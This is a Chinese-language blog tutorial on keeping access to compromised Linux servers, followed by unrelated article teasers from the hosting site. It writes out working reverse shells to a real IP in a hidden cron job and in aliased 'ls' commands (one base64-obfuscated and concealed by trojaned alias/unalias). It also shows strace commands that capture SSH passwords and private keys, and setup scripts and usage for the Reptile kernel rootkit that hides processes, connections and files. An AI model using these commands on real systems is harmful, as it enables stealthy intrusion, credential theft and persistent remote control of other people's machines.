145-Linux权限维持Rootkit后门Strace监控Alias别名Cron定时任务

本文主要是介绍145-Linux权限维持Rootkit后门Strace监控Alias别名Cron定时任务,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

参考 【权限维持】Linux&Rootkit后门&Strace监控&Alias别名&Cron定时任务_alias ls='alerts(){ ls $* --color=auto;python -c "-CSDN博客

参考 FlowUs 息流 - 新一代生产力工具

权限维持-Linux-定时任务-Cron后门

利用系统的定时任务功能进行反弹Shell

1、编辑后门反弹shell脚本

vim /etc/.xiaodi.sh

内容:

#!/bin/bash

bash -i >& /dev/tcp/47.94.236.117/3333 0>&1

chmod +x /etc/.xiaodi.sh

2、添加定时任务

vim /etc/crontab

*/1 * * * * root /etc/.xiaodi.sh #表示每分钟执行一次

这个定时任务用的是直接修改 /etc/crontab的方式,这个文件会对所有的用户生效,同时使用crontab命令是看不到的,如果是使用crontab -e的方式添加的任务使用crontab -l是看得到的,不过也有隐藏此任务的方式

可以看看 https://www.cnblogs.com/awake1t/p/14498443.html

不过此方式也是对于-l 命令的隐藏和对于直接查看任务记录文件,还是可以通过 -A参数查看

权限维持-Linux-监控功能-Strace后门

strace是一个动态跟踪工具,它可以跟踪系统调用的执行。

我们可以把他当成一个键盘记录的后门,来扩大我们的信息收集范围

1、记录sshd明文

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)

查看

grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

输入第一条命令后再使用ssh进行登录然后使用第二条命令进行查看可以看到命令明文密码,同时此密码被保存在了/tmp/.ssh.log中

2、记录sshd私钥

记录

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 4096 2> /tmp/.sshd.log &)

查看

grep 'PRIVATE KEY' /tmp/.sshd.log

此方法也是同样的可以用来记录ssh登录的私钥保存到文件中。

 

权限维持-Linux-命令自定义-Alias后门

alias命令的功能:为命令设置别名

定义:alias ls='ls -al'

删除:unalias ls

每次输入ls命令的时候都能实现ls -al

不过此命令修改后重启就失效了,可以通过修改启动项文件实现维持

1、简单:

这种直接反弹shell的方式再执行了替换后的命令后会因为建立了链接从而卡住。

alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/47.94.236.117/3333 0>&1; };alerts'

2、升级:

其实就是换了个反弹shell的命令,用的python去执行的,相当于重新使用python起了了一个链接所以shell界面不会卡住,中间这一段base64编码的内容就是反弹shell的代码,记得修改监听的ip和端口再编码使用。如果可以使用python我想php应该也是可以的(只使用第一段代码,后面两个是用来持久化的)

alias ls='alerts(){ ls $* --color=auto;python3 -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'\''UTF-8'\'')}[sys.version_info[0]]('\''aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiNDcuOTQuMjM2LjExNyIsIDY2NjYpKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMCkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDEpCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAyKQogICAgICAgIHAgPSBzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwgIi1pIl0pCiAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6CiAgICAgICAgZXhpdCgp'\'')))";};alerts'alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'alias alias='alerts(){ alias "$@" | grep -v unalias | sed "s/alerts.*lambda.*/ls --color=auto'\''/";};alerts'

3、持久化+隐藏:重启依旧生效

vim /etc/upload # 这个文件中放置上面升级版的全部内容

vim ~/.bashrc #此文件相当于是Windows的启动项文件,修改这个文件使得达到持久化的目的。不过阿里云服务器不可以修改这个文件,可能是有保护机制。

if [ -f /etc/upload ]; then

. /etc/upload

fi

 

权限维持-Linux-内核加载LKM-Rootkit后门

现在常用的linux维持权限的方法大多用crontab和开机自启动,同时使用的大多是msf 或者其它的tcp连接来反弹shell ,这种做法比较容易被管理员发现。所以我们想有一个非tcp连接、流量不容易被怀疑的后门,并且在大量的shell的场景下,可以管shell,Reptile刚好是种LKM rootkit,因此具有很好的隐藏性和强大的功能。

主要还是常见的反弹shell的链接太过明显,查看链接就可以看到奇怪的链接一下就发现了,通过内核级的rootkit可以实现隐藏进程隐藏链接实现真正的隐藏。

项目地址: https://github.com/f0rb1dd3n/Reptile

自动化脚本搭建

保存为sh文件

Centos系统脚本

$kernel=uname -r
centos
yum -y install perl vim gcc make g++ unzip
#由于Cenots内核管理不便,所以使用下载对应版本的kernel-devel到本地
yum -y localinstall kernel-devel-"$kernal".rpm
cd Reptile-2.0/ && chmod +x ./setup.sh     # Reptile-2.0/这个是目录,需要自定义根据自己的情况,文件即是从项目地址下载的
./setup.sh install <<EOF
reptile
hax0r
s3cr3t
reptile
666
y
47.94.236.117 
4444
1
EOF
# 监听的ip还有端口这里也要修改s3cr3t和reptile是连接的账号和密码,后面会用到

ubuntu系统脚本

apt-get install vim gcc make g++ unzip -y
apt-get -y install linux-headers-$(uname -r)
cd Reptile-2.0/ && chmod +x ./setup.sh
./setup.sh install <<EOF
reptile
hax0r
s3cr3t
reptile
666
y
47.94.236.117
4444
1
EOF

用脚本进行安装的那个Reptile-2.0/不会删除,为了隐藏可以手动删除文件夹。

如果要手动安装也是用项目中的setup.sh执行就可以了

我这里使用的本地的centos7可以使用项目的setup.sh直接进行安装不用使用脚本,我估计是需要安装的一些命令没有所以才会报错的或者环境变量的问题。

这里的666端口是占用靶机本地的端口和远程进行通信

1、使用参考:

https://github.com/f0rb1dd3n/Reptile/wiki

1、隐藏进程:

/reptile/reptile_cmd hide

显示进程:

/reptile/reptile_cmd show

创建一个ping的进程

nohup ping 114.114.114.114 &

查看进程

ps -ef | grep ping | grep -v grep

使用命令隐藏进程

/reptile/reptile_cmd hide 6278

再次查看进程

ps -ef | grep ping | grep -v grep

让他再显示出来

/reptile/reptile_cmd show 6278

2、隐藏连接:

/reptile/reptile_cmd udp hide

显示连接:

/reptile/reptile_cmd tcp show

netstat -anpt | grep 100.100.45.106 #这里假如建立了一个与100.100.45.106的通信的tcp连接

/reptile/reptile_cmd tcp 100.100.45.106 5555 hide #隐藏tcp协议的,目的地址是100.100.45.106目的端口是5555的进程

3、隐藏文件:

文件名中带reptile的都会被隐藏

mkdir reptile_dreamer292

mkdir reptile_file

ls -al

cd reptile_dreamer292

 

2、高级玩法

客户端安装

./setup.sh client #我的kali算是比较新的版本安装时报了错后面看脚本去排查发现需要apt install libreadline-dev 安装一个这个即可,其实是缺了一些库

cd bin

./client #即可进入客户端

设置连接配置(有些类似msf,命令区分大小写)

set LHOST 192.168.152.56 #Local host to receive the shell

set LPORT 4444 #Local port to receive the shell

set SRCHOST 192.168.152.56 #Source host on magic packets (spoof)

set SRCPORT 666 #Source port on magic packets (only for TCP/UDP) (这里就是前面设置的占用靶机的端口)

set RHOST 192.168.152.62 #Remote host

set RPORT 22 #Remote port (only for TCP/UDP)(伪装的端口,相当于进程注入)

set PROT tcp #Protocol to send magic packet (ICMP/TCP/UDP)(协议类型)

set PASS s3cr3t #Backdoor password (optional)(前面定义的密码)

set TOKEN hax0r #Token to trigger the shell(前面定义的账号)

设置好后直接开run

连接成功

进入shell

并且在靶机那边是看不到任何的链接的情况的

已经算是一个c2了,好恐怖的rootkit,太强了。

rootkit的查杀是最麻烦的一种,因为根本不知道他都对内核修改了什么东西,一旦中了rootkit基本就是寄了所以防范的方法只有在植入rootkit之前进行拦截。

这篇关于145-Linux权限维持Rootkit后门Strace监控Alias别名Cron定时任务的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1146712

相关文章

Spring Security 基于表达式的权限控制

前言 spring security 3.0已经可以使用spring el表达式来控制授权,允许在表达式中使用复杂的布尔逻辑来控制访问的权限。 常见的表达式 Spring Security可用表达式对象的基类是SecurityExpressionRoot。 表达式描述hasRole([role])用户拥有制定的角色时返回true (Spring security默认会带有ROLE_前缀),去

流媒体平台/视频监控/安防视频汇聚EasyCVR播放暂停后视频画面黑屏是什么原因?

视频智能分析/视频监控/安防监控综合管理系统EasyCVR视频汇聚融合平台,是TSINGSEE青犀视频垂直深耕音视频流媒体技术、AI智能技术领域的杰出成果。该平台以其强大的视频处理、汇聚与融合能力,在构建全栈视频监控系统中展现出了独特的优势。视频监控管理系统EasyCVR平台内置了强大的视频解码、转码、压缩等技术,能够处理多种视频流格式,并以多种格式(RTMP、RTSP、HTTP-FLV、WebS

linux-基础知识3

打包和压缩 zip 安装zip软件包 yum -y install zip unzip 压缩打包命令: zip -q -r -d -u 压缩包文件名 目录和文件名列表 -q:不显示命令执行过程-r:递归处理,打包各级子目录和文件-u:把文件增加/替换到压缩包中-d:从压缩包中删除指定的文件 解压:unzip 压缩包名 打包文件 把压缩包从服务器下载到本地 把压缩包上传到服务器(zip

综合安防管理平台LntonAIServer视频监控汇聚抖动检测算法优势

LntonAIServer视频质量诊断功能中的抖动检测是一个专门针对视频稳定性进行分析的功能。抖动通常是指视频帧之间的不必要运动,这种运动可能是由于摄像机的移动、传输中的错误或编解码问题导致的。抖动检测对于确保视频内容的平滑性和观看体验至关重要。 优势 1. 提高图像质量 - 清晰度提升:减少抖动,提高图像的清晰度和细节表现力,使得监控画面更加真实可信。 - 细节增强:在低光条件下,抖

让树莓派智能语音助手实现定时提醒功能

最初的时候是想直接在rasa 的chatbot上实现,因为rasa本身是带有remindschedule模块的。不过经过一番折腾后,忽然发现,chatbot上实现的定时,语音助手不一定会有响应。因为,我目前语音助手的代码设置了长时间无应答会结束对话,这样一来,chatbot定时提醒的触发就不会被语音助手获悉。那怎么让语音助手也具有定时提醒功能呢? 我最后选择的方法是用threading.Time

Linux 网络编程 --- 应用层

一、自定义协议和序列化反序列化 代码: 序列化反序列化实现网络版本计算器 二、HTTP协议 1、谈两个简单的预备知识 https://www.baidu.com/ --- 域名 --- 域名解析 --- IP地址 http的端口号为80端口,https的端口号为443 url为统一资源定位符。CSDNhttps://mp.csdn.net/mp_blog/creation/editor

【Python编程】Linux创建虚拟环境并配置与notebook相连接

1.创建 使用 venv 创建虚拟环境。例如,在当前目录下创建一个名为 myenv 的虚拟环境: python3 -m venv myenv 2.激活 激活虚拟环境使其成为当前终端会话的活动环境。运行: source myenv/bin/activate 3.与notebook连接 在虚拟环境中,使用 pip 安装 Jupyter 和 ipykernel: pip instal

Linux_kernel驱动开发11

一、改回nfs方式挂载根文件系统         在产品将要上线之前,需要制作不同类型格式的根文件系统         在产品研发阶段,我们还是需要使用nfs的方式挂载根文件系统         优点:可以直接在上位机中修改文件系统内容,延长EMMC的寿命         【1】重启上位机nfs服务         sudo service nfs-kernel-server resta

【Linux 从基础到进阶】Ansible自动化运维工具使用

Ansible自动化运维工具使用 Ansible 是一款开源的自动化运维工具,采用无代理架构(agentless),基于 SSH 连接进行管理,具有简单易用、灵活强大、可扩展性高等特点。它广泛用于服务器管理、应用部署、配置管理等任务。本文将介绍 Ansible 的安装、基本使用方法及一些实际运维场景中的应用,旨在帮助运维人员快速上手并熟练运用 Ansible。 1. Ansible的核心概念